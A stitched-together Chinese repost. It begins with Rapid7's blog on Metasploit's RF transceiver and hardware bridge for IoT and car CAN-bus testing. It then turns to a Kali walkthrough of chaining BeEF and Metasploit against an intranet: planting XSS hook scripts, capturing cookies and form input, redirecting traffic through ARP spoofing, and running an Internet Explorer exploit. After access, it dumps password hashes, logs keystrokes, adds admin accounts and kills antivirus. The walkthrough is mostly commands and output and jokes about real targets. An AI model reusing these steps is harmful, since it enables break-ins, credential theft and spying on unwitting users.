Metasploit的射频收发器功能 | Metasploit’s RF Transceiver Capabilities

https://community.rapid7.com/community/metasploit/blog/2017/03/21/metasploits-rf-transceiver-capabilities

物联网兴起

我们花费大量时间来监控我们的企业网络,并使用许多工具来检测异常的行为。我们不断地扫描漏洞、公布测试。然而,我们经常不能认识到自己网络,和家庭中的小型(有时是大型)物联网(IoT)设备。令人震惊的是,考虑到它们的普遍性 – 这些设备并不是容易被测试的。

RF:(无线射频识别(RadioFrequency))一般指无线射频

虽然很困难,在技术上,可以通过其以太网侧的连接来发现和识别这其中的部分IoT设备。但这不能让我们全面了解这些设备对消费者或企业带来的风险。当仅评估以太网连接的设备时,您可能会错过对企业安全造成重大影响的无线系统。无线网络通常会控制警报系统、监控、门禁、机房HVAC控制等诸多领域。

这给我们带来了一个非常关键的问题:如何真正确定这些设备的风险?

从最基础开始:

  • 这些连接的设备能做什么?
  • 这些设备的作用范围是多少?
  • 设备是否具有无线功能?

传统上,我们经常对802.11无线网络执行周期扫描,以确保接入点是否安全,网络流量是否过大。我们可以监控并创建堆叠的AP以防止他们某一个挂掉或者被附近电磁干扰。当然,如果你问:其它频率的无线频段呢?而这恰恰是我们要研究的领域和方向。

也许您由于其他原因使用非802.11标准以外的其他无线电频。遥控车库门?RFID读卡器、无线安全系统、Zigbee控制灯或HVAC系统等。

这些设备的频率范围是多少?它们是否加密受保护?当受到干扰时会发生什么?在封闭或开放的状态下是否失败?

无法有效地回答这些问题,是我们发布Metasploit硬件桥射频(RF)收发器的真正原因,也说明为什么我们认为这将是安全研究人员和渗透测试人员了解其实际攻击面的关键工具。

现在,安全团队将能够对公司的安全状况进行更真实的评估。能够测试物理安全控制,并更好地了解物联网及其他设备的安全性。

以安全研究的名义进行的大部分活动可能是有争议的或难以理解的。 但RF测试肯定是正确的,随着我们看到越来越多的技术利用RF通信,研究领域变得越来越多和越普遍。

对安全测试领域开发的任何技术最常见的批评是:容易被攻击者利用。安全圈有个常见的反应:如果已经被攻击者利用,那我们唯有了解黑客在做什么、有效地模拟攻击方法,并展示攻击潜在的影响,才能采取必要的措施来阻止他们。

这是Metasploit背后的逻辑,以及驱动了Rapid7大规模的漏洞研究工作。这也是RF 收发器出现的原因。我们坚信,RF测试是漏洞测试非常重要的的一部分(虽然目前仍被忽视),随着物联网生态系统的发展,射频测试的重要性将会持续增加。

我们有这样一个案例,2016年,Rapid7的Jay Radcliffe公布了强生公司Animas OneTouch Ping胰岛素泵的多个漏洞。

https://v.qq.com/iframe/player.html?vid=h0387fb90nt&width=986&height=739.5&auto=0攻击演示过程

普通的泵具有血糖仪,其通过专有无线管理协议中的无线电频作为遥控器。泵和遥控器之间的通信以明文而非加密的形式传输。这为攻击者创造了机会,使用适当的技术手段和资源来欺骗短距离遥控器将触发未经授权的胰岛素注射。

虽然Jay认为攻击者利用这些漏洞的可能性比较低,但可能会严重伤害使用该技术的患者。幸运的是,Jay及时发现了这个问题,并给强生公司提出建议,通知病患者使其减轻风险。 如若没有RF测试,这些漏洞可能一直存在,患者将无法做出选择来保护自己。

Status-1
REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
PUMP: 00 00 FF 00 1A D1 81 81 ........
REMOTE: 20 00 0E 00 BF DB CC 6F ......o
PUMP: 03 00 F1 04 16 B9 B9 87 2C 01 00 00 ........,...
REMOTE: 03 00 F8 00 31 FD C9 EE ....1...
PUMP: 03 00 07 04 88 76 DA DD 2C 01 00 00 .....v..,...
REMOTE: 03 00 12 00 F0 30 0E FC .....0..
PUMP: 20 00 ED 12 E7 BC 93 43 01 01 27 05 26 02 8F 00 ......C..'.&...
PUMP: 57 45 45 4B 44 41 59 00 00 00 WEEKDAY...
PUMP: 05 00 EA 00 D5 8F 84 B3

样本数据包

工作原理

在解释其工作原理之前,需做一个简单申明: Rapid7不销售RF测试所需的硬件。您可以在任何地方获得。比如:Hacker Warehouse,Hak5,淘宝,京东,亚马逊或任何无线设备的电子商店。

使用射频(RF)收发器,安全专家能够制作并监控不同的RF数据包,以正确识别和访问公司内除以太网以外的无线网络系统。

第一个RF收发器版本支持TI cc11xx低功耗Sub-1GHz射频收发器。 RF收发器可以调整设备来识别和调制解码信号。甚至可以创建短时间的干扰来识别故障状态。该版本还提供了与TI cc11xx芯片组流行的RfCat python框架兼容的完整API。如果您现有的程序使用RfCat,您可以轻易的将它们移植到Metasploit中。此版本附带两个后置模块:基于暴力破解的振幅调制(rfpwnon) 和 通用发射器(transmitter)。

如何使用RF Transceiver

使用新的RF 收发器需要购买像Rard Stick One这样兼容RfCat的设备。 然后下载最新的RfCat驱动程序,在这些驱动程序中,会有一个rfcat_msfrelay。这是RfCat中Metasploit Framework的中继服务器,运行在附属的RfCat兼容设备系统上。

您可以连接硬件桥:

$./msfconsole -q
msf > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > run

[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-02-16 20:04:57 -0600
[+] HWBridge session established
[*] HW Specialty: {"rftransceiver"=>true} Capabilities: {"cc11xx"=>true}
[!] NOTICE: You are about to leave the matrix. All actions performed on this hardware bridge
[!] could have real world consequences. Use this module in a controlled testing
[!] environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 hwbridge cmd/hardware rftransceiver 127.0.0.1 -> 127.0.0.1 (127.0.0.1)

msf auxiliary(connect) > sessions -i 1
[*] Starting interaction with 1...

hwbridge > status
[*] Operational: Yes
[*] Device: YARDSTICKONE
[*] FW Version: 450
[*] HW Version: 0348

要了解有关RF Transceiver的更多信息,在这里下载最新的Metasploit:

https://www.rapid7.com/products/metasploit/download/community

The rise of the Internet of Things

We spend a lot of time monitoring our corporate networks. We have many tools to detect strange behaviors. We scan for vulnerabilities. We measure our exposure constantly. However, we often fail to recognize the small (and sometimes big) Internet of Things (IoT) devices that are all around our network, employees, and employees’ homes. Somewhat alarmingly – considering their pervasiveness — these devices aren’t always the easiest to test.

Though often difficult, it is technically possible to find and identify some of these IoT devices via their Ethernet side connection. But that doesn’t always give us a full picture of the risk these devices present to consumers or organizations. When assessing only Ethernet connected devices you can miss the wireless world that can have a major impact on the security of your organization. Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas.

Which leaves us with one very critical question: how do you really determine the risk of these devices?

Let’s start with the basics:

  • What do these connected devices do?
  • What is the range of exposure of these devices?
  • Does the device have wireless capabilities?

Traditionally, we often perform perimeter scans of our 802.11 wireless networks to ensure our Access Points are secure and the network bleed isn’t too large. We can monitor these Access Points (APs) to create overlap in case one goes down or gets interference from a nearby kitchen microwave.

However, if you’re asking yourself, “but what about the rest of the wireless spectrum?” that’s exactly the position we found ourselves in.

Radio, radio, everywhere

Chances are your company and employees are already using many other radio frequencies (RFs) outside of the standard 802.11 network for various reasons. Perhaps you have a garage door with a wireless opener? Company vehicle key fobs? Not to mention RFID card readers, wireless security systems, Zigbee controlled lights, or HVAC systems.

What are the ranges for these devices? Are they encrypted or protected? What happens when they receive interference? Do they fail in a closed or open state?

The inability to effectively answer these questions (easily or even at all) is the very reason we are releasing the RFTransceiver extension for Metasploit’s Hardware Bridge, and why we think this will be a critical tool for security researchers and penetration testers in understanding the actual attack surface.

Now, security teams will be able to perform a much broader assessment of a company’s true security posture. They will be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises.

Sunlight is the best disinfectant

Much of the activity undertaken in the name of security research can be contentious, divisive, or hard to understand. This is certainly true of RF testing, an area of research becoming both more prevalent and increasingly necessary as we see more and more technologies leveraging RF communications.

The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things. The most common response from the security research community is that the bad guys are already doing bad things, and that it’s only when we understand what they’re doing, can effectively replicate it, and demonstrate the potential impact of attacks, that we can take the necessary steps to stop them. Sunlight is the best disinfectant.

This is the logic behind Metasploit, as well as what drives Rapid7’s extensive vulnerability research efforts. It is also the reasoning behind the RFTransceiver. We strongly believe that RF testing is an incredibly important – though currently often overlooked – component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk. We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands.

To provide an example of this kind of testing, in 2016, Rapid7’s Jay Radcliffe disclosed vulnerabilities in Johnson & Johnson’s Animas OneTouch Ping insulin pump. The popular pump has a blood glucose meter that serves as a remote control via radio frequency in a proprietary wireless management protocol. Communications between the pump and the remote control are sent in cleartext, rather than being encrypted. This creates an opportunity for an attacker with the right technical skills and resources, opportunity, and motive to spoof the Meter Remote and trigger unauthorized insulin injections.

While Jay considered the likelihood of an attacker exploiting these vulnerabilities in the wild to be quite low, it could seriously harm a patient using the technology. Fortunately, Jay’s research uncovered the problem and he was able to work with Johnson & Johnson to notify patients and advise them of ways to mitigate the risk. Without RF testing, these vulnerabilities would have continued to go unnoticed, and patients would not have the opportunity to make informed choices to protect themselves.

How it works

Just one quick author’s note before we get into the ‘how-to’ portion. Rapid7 does not sell the hardware required to perform RF testing. The required hardware can be found at any number of places, including Hacker Warehouse, Hak5, or any electronics store that carries software defined radios or RF transmitter hobbyist equipment.

With the RFTransceiver, security pros have the ability to craft and monitor different RF packets to properly identify and access a company’s wireless systems beyond Ethernet accessible technologies.

The first RFTransceiver release supports the TI cc11xx Low-Power Sub-1GHz RF Transceiver. The RFTransceiver extension makes it possible to tune your device to identify and demodulate signals. You can even create short bursts of interference to identify failure states. This release provides a full API that is compatible with the popular RfCat python framework for the TI cc11xx chipsets. If you have existing programs that use RfCat you should be able to port those into Metasploit without much difficulty. This release comes with two post modules: an Amplitude Modulation based brute forcer (rfpwnon) and a generic transmitter (transmitter).

How to use RFTransceiver

Using the new RFTransceiver extension requires the purchase of an RfCat-compatible device like the Yard Stick One. Then download the latest RfCat drivers, included with those drivers you will find rfcat_msfrelay. This is the Metasploit Framework relay server for RfCat. Run this on the system with the RfCat compatible device attached.

Then you can connect with the hardware bridge:

./msfconsole -q

msf > use auxiliary/client/hwbridge/connect

msf auxiliary(connect) > run

[*] Attempting to connect to 127.0.0.1...

[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-02-16 20:04:57 -0600

[+] HWBridge session established

[*] HW Specialty: {"rftransceiver"=>true}  Capabilities: {"cc11xx"=>true}

[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge

[!]          could have real world consequences.  Use this module in a controlled testing

[!]          environment and with equipment you are authorized to perform testing on.

[*] Auxiliary module execution completed

msf auxiliary(connect) > sessions

Active sessions

===============

Id  Type                   Information    Connection

--  ----                   -----------    ----------

1   hwbridge cmd/hardware  rftransceiver  127.0.0.1 -> 127.0.0.1 (127.0.0.1)

msf auxiliary(connect) > sessions -i 1

[*] Starting interaction with 1...

hwbridge > status

[*] Operational: Yes

[*] Device: YARDSTICKONE

[*] FW Version: 450

[*] HW Version: 0348

To learn more about the RFTransceiver, you can download the latest Metasploit here: https://www.rapid7.com/products/metasploit/download/community/

Metasploit 支持IoT安全测试

metasploit

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。

2003年,H.D. Moore发布Metasploit后,对目标进行“渗透测试”的似乎变得容易多了。2016年面对物联网领域的安全威胁,Metasploit似乎一直“束手无策”,弄得小伙伴们十分失望。

snip20170208_2

近日,Rapid7 公布已更新 Metasploit 框架,支持物联网硬件的安全测试啦~~~~

本周,Rapid7博客宣布包括现代汽车控制器局域网CAN、物联网IoT设备以及工业控制系统在内的硬件,都可以通过Metasploit进行渗透测试。

这个名为“Hardware Bridge API”的扩展,让Metasploit成为首个“通杀”软件与硬件的渗透测试神器。它使用无线通讯并通过突破了之前用于阻止渗透测试的网络限制、直接控制硬件,同时它还解决了开发者需要为不同硬件打造定制工具的麻烦。

Rapid7的安全研究人员 Craig Smith称:设备制造者可以通过两种方式与Metasploit进行连接。一种是将Metasploit直接接入固件;另一种则是创建一个中继服务,特别是当设备无法使用以太网,例如软件定义无线电的设备只能通过USB端口连接。

HWBridge API的核心功能包括收集设备性能信息、版本化数据或电量相关信息,以及用于测试不同物理设备的独立扩展。例如测试汽车控制器局域网络时,它能够支持CAN并提供几种用于进行渗透测试的相关指令。

应用举例:

新发布的版本支持SocketCAN。如果你有Linux系统和支持SocketCAN的CAN总线嗅探器就可以进行测试了。local_hwbridge模块就是个简易中继服务的示例,你可以在本地或者远程服务器运行。

msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:8080/6xOv7GqFs3YTeIE
[*] Local IP: http://10.1.10.21:8080/6xOv7GqFs3YTeIE
[*] Server started.
msf auxiliary(local_hwbridge) >

local_hwbridge模块默认会检测任何SocketCAN数据,不需要输入任何选项。中继服务无需在Metasploit中运行。如果硬件本身支持REST API的话就可以跳过这步。

msf > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > set rhost 10.1.10.21
rhost => 10.1.10.21
msf auxiliary(connect) > set targeturi 6xOv7GqFs3YTeIE
targeturi => 6xOv7GqFs3YTeIE
msf auxiliary(connect) > run
[*] Attempting to connect to 10.1.10.21...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-01-17 11:02:34 -0800
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions
 
Active sessions
===============
 
  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   hwbridge cmd/hardware  automotive   127.0.0.1 -> 127.0.0.1 (10.1.10.21)

设备连接后,就会建立一个HWBridge会话。如果你比较熟悉meterpreter的话,你就会习惯使用hwbridge。你可以输入help获取命令列表,或者运行指定模块如getvinfo(获取汽车信息)。

msf auxiliary(connect) > sess 1
[*] Starting interaction with 1...
hwbridge > supported_buses
Available buses
 
can0, can1, can2
 
hwbridge > run post/hardware/automotive/getvinfo CANBUS=can2
[*] Available PIDS for pulling realtime data: 46 pids
[*]   [1, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17, 19, 20, 21, 24, 25, 28, 31, 32, 32, 33, 44, 45, 46, 47, 48, 49, 50, 51, 60, 61, 64, 65, 66, 67, 68, 69, 70, 71, 73, 74, 76]
[*]   MIL (Engine Light) : OFF
[*]   Number of DTCs: 0
[*]   Engine Temp: 48 °C / 118 °F
[*]   RPMS: 0
[*]   Speed: 0 km/h  /  0.0 mph
[*] Supported OBD Standards: OBD and OBD-II
[*] Mode $09 Vehicle Info Supported PIDS: [2, 4, 6, 8]
[*] VIN: 1G1ZT53826F109149
[*] Calibration ID: UDS ERR: {"RCRRP"=>"Request Correctly Received, but Response is Pending"}
[*] PID 6 Response: ["00", "00", "C4", "E9", "00", "00", "17", "33", "00", "00", "00", "00"]
[*] PID 8 Response: ["00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00"]

即将加入更多硬件模式

据悉,Metasploit 开源社区迄今已包含 1,600 漏洞和 3,300 模块,管理Metasploit工具的Rapid7公司表示,之后还会加入其他功能。

logo

详细信息请查阅:

http://opengarages.org/hwbridge/#get-a-list-of-methods

https://www.rapid7.com/about/press-releases/rapid7-enables-iot-hardware-security-testing-with-metasploit/

https://community.rapid7.com/community/transpo-security/blog/2017/02/02/exiting-the-matrix

http://www.darkreading.com/vulnerabilities—threats/metasploit-can-now-be-directly-linked-to-hardware-for-vulnerability-testing/d/d-id/1328047

按捺不住了吧,试试?O(∩_∩)O~

转自:

微信公众号:开源恶意代码基准测试

Kali Linux渗透测试:Metasploit与Beef联动打入企业内网

t0153df974d9d0f5809.jpg

0x01:科普

Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配合metasploit绝对是内网渗透一大杀器。

官网 http://beefproject.com/

博客 http://blog.beefproject.com/

0x02安装

Kali linux 系统默认未安装beef,需要自行安装。

apt-get update
apt-get install beef-xss

0x03入门

0x03.1启动

主目录:

/usr/share/beef-xss

cd /usr/share/beef-xss

./beef

t01287a4dec5cc49b91.png

t0178b9b1ea09d0e72b.png

127.0.0.1:3000/ui/pannel

账号密码

beef/beef

t01fac022bc1ad5e4aa.png

demos:Beef-Xss ip:3000/demos/butcher/index.html

测试两台主机网络通信是否正常:

t011e6491eb9aafbd00.png

访问Beef demo页面

t01dc43ebf9a8fb188b.png

demo页面嵌入了hook.js 访问>中招

0x04挂马:

在正常页面添加script标签,嵌入恶意脚本

t01bd3f243cd506ca12.png

在实际渗透中(需要一个公网的IP),如何让受害者访问我们嵌有hook.js的页面呢?

网站反馈页面,举报页面案例:用Xss平台沦陷百度投诉中心后台

当然,这位同学用的是Xss平台,而不是beef,利用Beef的话,不仅能得到后台管理员的Cookie,再配合Metasploit,还能以管理员主机浏览器当做跳板,进入公司内网。

Online Browersers->右击->Use As Proxy

http://p5.qhimg.com/t0107cb7746a23e6d35.jpg

再配合ARP攻击,MITM中间人攻击,对内网内所有Http请求重定向基本…(这里露出一个你懂的WS笑容)

Beef后台检测到有主机上线(感觉好像当年玩的灰鸽子、上兴 =。= 囧)

t016bd52ff0f6e09d92.png

通过浏览器,我们可以看到目标主机的很多信息:

浏览器信息:
名称
版本
Browser UA String
Browser Platform
Windows size
插件基本信息:
Flash
VBS脚本
Web Sock
Quick Time
...
Api信息
Cookie
操作系统信息
Date 时间日期
硬件信息
Cpu (32/64)
屏幕分辨率
是否支持触屏

And So On

用火狐浏览器测试

t0191ac372d53212d0d.png

t011909d221bef87b75.png

Beef功能模块组件

http://p6.qhimg.com/t013e83e9938073faa9.jpg

常用功能/模块

Browser:获取浏览器信息
--Hooked Domain
-----Get Cookie 获取客户端Cookie信息 执行一次命令在右边显示Cookie;
-----Get From Value 获取页面提交的表单信息:截获填写的银行卡信息、注册页面的用户名密码;
-----Redirect Browser 浏览器重定向

t011ca9c6d662701d53.jpg

执行后,目标浏览器访问任何网站都将会被重定向到bobao.360.cn,实际渗透的时候在内网实施ARP攻击,将内网所有Http请求流量重定向到嵌入了Hook恶意脚本的页面…(在这里露出一个淫荡的笑容)

Chrome Extensions:
Debug:测试Http请求
Exploits:利用浏览器漏洞进行攻击
Host:获取受害者主机信息
Mtasploit:结合Metasploit进行渗透,这个也是本文的重点。
Network:进行Doser、ping、DNS枚举、端口扫描等等
Social Enhineering:社工模块

0x05与Metasploit联动

Beef配置文件

/usr/share/beef-xss/config.yaml

  metasploit:
enable: false

改成

metasploit:
enable: true
vim /usr/share/beef-xss/config.yaml
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
    version: '0.4.4.5-alpha'
    debug: false
    restrictions:
        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        # subnet of browser ip addresses that can connect to the UI
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
        # It's not advised to decrease it with tons of hooked browsers (more than 50),
        # because it might impact performance. Also, enable WebSockets is generally better.
        xhr_poll_timeout: 5000
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental
        # DNS
        dns_host: "localhost"
        dns_port: 53
        panel_path: "/ui/panel"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"
        # Allow one or multiple domains to access the RESTful API using CORS
        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
          enable: false
          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
          port: 61985 # WS: good success rate through proxies
          secure_port: 61986 # WSSecure
          ws_poll_timeout: 1000 # poll BeEF every second
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" #supported: apache, iis
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"
    database:
        # For information on using other databases please read the
        # README.databases file
        # supported DBs: sqlite, mysql, postgres
        # NOTE: you must change the Gemfile adding a gem require line like:
        #   gem "dm-postgres-adapter"
        # or
        #   gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"
        # db_file is only used for sqlite
        db_file: "db/beef.db"
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
        db_encoding: "UTF-8"
    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
    credentials:
        user:   "beef"
        passwd: "beef"
    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
        enable: true
        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
        allow_user_notify: true
    crypto_default_value_length: 80
    # Enable client-side debugging
    client:
        debug: false
    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: true
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
             shell:
                enable: false
        ipec:
            enable: true
vim /usr/share/beef-xss/extensions/metasploit/config.yaml
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "172.16.244.129"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            ssl: false
            ssl_version: 'SSLv3'
            ssl_verify: true
            callback_host: "172.16.244.129"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [ 
              {os: 'osx', path: '/opt/local/msf/'},
              {os: 'livecd', path: '/opt/metasploit-framework/'},
              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
              {os: 'bt5', path: '/opt/framework3/msf3/'},
              {os: 'backbox', path: '/opt/metasploit3/msf3/'},
              {os: 'win', path: 'c:\\metasploit-framework\\'},
              {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]

原:

 

{os: 'custom', path: ''}

修改成

{os: 'custom', path: '/usr/share/metasploit-framework/'}

修改 host callback_host两参数,改为beef主机IP

重启postgresq、metasploit、服务

service postgresql restart & service metasploit restart

t019e7cd4b2aa99d854.jpg

msfconsole #启动Metasploit
load msgrpc ServerHost=172.16.244.129 Pass=abc123

t0169debf48fbc3942a.jpg

重启Beef

t0190d651f583e54f3b.jpg

启动beef这里提示已经载入246个metasploit的EXP,MSF更新到最新版应该有五六百个EXP

进入Beef后台(莫名成了245 =。=!)

t01d5aa2f783869c7f9.jpg

use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost 172.16.244.129
exploit/run

t01418a1cdbd8c6e6a1.jpg

t01560b8713b2414391.jpg

靶机被强行跳转到被监听的URL

t0165e1ff04e684fc88.jpg

MSF成功监听到(但,貌似是虚拟机装的XP把这个漏洞补了,所以没产生session会话)

t01fcc6b6cff8f19f8c.jpg

如果XP没有打补丁,即存在这个EXP针对的漏洞,这里会产生一个session会话

session -i 1

t01645e28238ba42595.jpg

screenshot 截屏:截取遭钓鱼主机的屏幕到本地文件

sysinfo 查看系统信息

hashdump dump目标主机的用户Hash

0x06更多Meterpreter的命令

参考:

Meterpreter后渗透攻击命令

Metasploit工具Meterpreter的命令速查表

http://p4.qhimg.com/t01d1765f2cf024d362.png

上一篇 内网渗透一:利用Xss漏洞进入内网 的文章里,

0x01填坑:

我在这里填一下上一篇文章中的坑哈:

我们使用了exploit/windows/browser/ie_execcommand_uaf IE浏览器的这个EXP,但是执行之后发现目标主机虽然跳转了,但是有个报错:

(接第一篇)靶机被强行跳转到被监听的URL

t0165e1ff04e684fc88.jpg

MSF成功监听到

(但,貌似是虚拟机装的XP把这个漏洞补了,所以没产生session会话)

t01fcc6b6cff8f19f8c.jpg

过后查了这个原因好久,在Mickey牛的教导下,终于发现了报错的原因:

t01b39f5efd9cd3e70d.jpg

msf下输入 exploit/windows/browser/ie_execcommand_uaf

0x02找到问题:

执行info,查看该EXP的信息,发现这个EXP原来是针对XP SP3、Vista的IE7、IE8以及Win7的IE8、IE9。

msf exploit(ie_execcommand_uaf) > info
       Name: MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability 
     Module: exploit/windows/browser/ie_execcommand_uaf
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good
Provided by:
  unknown
  eromang
  binjo
  sinn3r <sinn3r@metasploit.com>
  juan vazquez <juan.vazquez@metasploit.com>
Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   IE 7 on Windows XP SP3
  2   IE 8 on Windows XP SP3
  3   IE 7 on Windows Vista
  4   IE 8 on Windows Vista
  5   IE 8 on Windows 7
  6   IE 9 on Windows 7
Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  OBFUSCATE   false            no        Enable JavaScript obfuscation
  SRVHOST     172.16.244.129   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)
Payload information:
Description:
  This module exploits a vulnerability found in Microsoft Internet 
  Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object 
  gets deleted in an unexpected manner, but the same memory is reused 
  again later in the CMshtmlEd::Exec() function, leading to a 
  use-after-free condition. Please note that this vulnerability has 
  been exploited in the wild since Sep 14 2012. Also note that 
  presently, this module has some target dependencies for the ROP 
  chain to be valid. For WinXP SP3 with IE8, msvcrt must be present 
  (as it is by default). For Vista or Win7 with IE8, or Win7 with IE9, 
  JRE 1.6.x or below must be installed (which is often the case).
References:

http://cvedetails.com/cve/2012-4969/

http://www.osvdb.org/85532

http://www.microsoft.com/technet/security/bulletin/MS12-063.mspx

http://technet.microsoft.com/en-us/security/advisory/2757760

http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/

http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/

然后默默地去下载了XP SP3、安装IE7(刚安装好的XP SP3使用的是IE6)

t012ac2b9b8be04d57c.jpg

(安装、重启、重新操作了第一篇里的步骤 So 省略若干字….)

0x03 EXP successful:

终于,返回了successful!

t0153df974d9d0f5809.jpg

sessions:
sessions -i 1

t014c25005aec91d011.jpg

sysinfo ipconfig ps hashdump…

0x04常用命令:

截屏:

screenshot

t010e771c1ce04bf392.jpg

t01cee72574f9ee8ec1.jpg

键盘记录:

meterpreter > run post/windows/capture/keylog_recorder 
[*] Executing module against SPRITEKI-674621
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20150315141552_default_172.16.244.136_host.windows.key_879494.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt 
[*] Stopping keystroke sniffer...

t0132f846d28cf21bc3.jpg

 

 

执行cmd:

meterpreter>shell

 

添加用户:

net user add name password /add

 

添加用户到管理组:

net localgroup administrator name /add

 

因为是内网 开启3389也没什么意义了

http://p6.qhimg.com/t01af5a67aa87185a65.jpg

 

Kill 杀软

http://p8.qhimg.com/t01b1051511f357c543.jpg

meterpreter > run scraper
[*] New session on 172.16.244.136:1114...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: Access is denied.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\FQvPwGSl.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\HFQhdyFt.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iNNrwzBu.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\QBVFVWVP.reg)
[*]  Cleaning HKCR
